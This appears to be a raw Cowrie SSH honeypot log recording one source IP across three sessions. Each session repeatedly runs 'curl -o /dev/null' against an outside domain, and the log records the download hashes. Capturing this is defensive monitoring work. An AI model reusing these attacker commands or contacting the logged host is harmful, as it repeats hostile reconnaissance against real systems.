{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.132514Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.136751Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.174072Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.175658Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.177002Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.184413Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.187644Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.188252Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.189833Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.190587Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.223350Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.227967Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.230480Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.232139Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.232733Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.237212Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.238910Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.239678Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.243870Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.245699Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.280762Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.283298Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.284988Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.285751Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.292039Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.293216Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.294960Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.296048Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.327261Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.331114Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.332883Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.333594Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.339275Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.341330Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.342515Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.344473Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.345152Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.375166Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.375970Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.410270Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.413192Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.416205Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.420563Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.421193Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.423136Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.423812Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.430844Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.453791Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.454572Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.467714Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.468644Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.473576Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.475421Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.475938Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.507891Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.510912Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.511664Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.516116Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.519907Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.522133Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.523811Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.524288Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.527827Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.531767Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.560669Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.561537Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.569885Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.573408Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.574133Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.577149Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.578296Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.610947Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.613569Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.617158Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.618255Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.618840Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.621167Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.621928Z","src_ip":"212.227.125.160","session":"9f264c568782"}
